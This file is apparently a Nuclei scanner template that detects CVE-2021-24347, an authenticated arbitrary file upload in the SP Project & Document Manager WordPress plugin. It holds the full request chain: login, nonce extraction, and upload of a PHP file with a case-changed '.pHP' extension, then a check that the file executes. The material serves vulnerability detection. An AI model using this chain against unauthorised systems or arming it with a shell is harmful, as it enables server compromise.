nuclei-templates/cves/2021/CVE-2021-24347.yaml

99 lines
3.3 KiB
YAML

id: CVE-2021-24347
info:
name: SP Project & Document Manager < 4.22 - Authenticated Shell Upload
author: theamanrawat
severity: high
description: |
The SP Project & Document Manager WordPress plugin before 4.22 allows users to upload files, however, the plugin attempts to prevent php and other similar files that could be executed on the server from being uploaded by checking the file extension. It was discovered that php files could still be uploaded by changing the file extension's case, for example, from "php" to "pHP".
remediation: Fixed in version 4.22
reference:
- https://wpscan.com/vulnerability/8f6e82d5-c0e9-468e-acb8-7cd549f6a45a
- https://wordpress.org/plugins/sp-client-document-manager/
- https://nvd.nist.gov/vuln/detail/CVE-2021-24347
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.3
cve-id: CVE-2021-24347
cwe-id: CWE-434
metadata:
verified: "true"
tags: cve,cve2021,rce,wordpress,wp-plugin,wp,sp-client-document-manager,authenticated
requests:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/admin.php?page=sp-client-document-manager-fileview HTTP/1.1
Host: {{Hostname}}
- |
POST /wp-admin/admin.php?page=sp-client-document-manager-fileview&id=1 HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryaeBrxrKJzAF0Tgfy
------WebKitFormBoundaryaeBrxrKJzAF0Tgfy
Content-Disposition: form-data; name="cdm_upload_file_field"
{{nonce}}
------WebKitFormBoundaryaeBrxrKJzAF0Tgfy
Content-Disposition: form-data; name="_wp_http_referer"
/wordpress/wp-admin/admin.php?page=sp-client-document-manager-fileview&id=1
------WebKitFormBoundaryaeBrxrKJzAF0Tgfy
Content-Disposition: form-data; name="dlg-upload-name"
------WebKitFormBoundaryaeBrxrKJzAF0Tgfy
Content-Disposition: form-data; name="dlg-upload-file[]"; filename=""
Content-Type: application/octet-stream
------WebKitFormBoundaryaeBrxrKJzAF0Tgfy
Content-Disposition: form-data; name="dlg-upload-file[]"; filename="{{randstr}}.pHP"
Content-Type: image/svg+xml
<?php
echo "CVE-2021-24347";
?>
------WebKitFormBoundaryaeBrxrKJzAF0Tgfy
Content-Disposition: form-data; name="dlg-upload-notes"
------WebKitFormBoundaryaeBrxrKJzAF0Tgfy
Content-Disposition: form-data; name="sp-cdm-community-upload"
Upload
------WebKitFormBoundaryaeBrxrKJzAF0Tgfy--
- |
GET /wp-content/uploads/sp-client-document-manager/1/{{to_lower("{{randstr}}.pHP")}} HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers-condition: and
matchers:
- type: dsl
dsl:
- contains(all_headers_4, "text/html")
- status_code_4 == 200
- contains(body_4, "CVE-2021-24347")
condition: and
extractors:
- type: regex
name: nonce
group: 1
regex:
- 'name="cdm_upload_file_field" value="([0-9a-zA-Z]+)"'
internal: true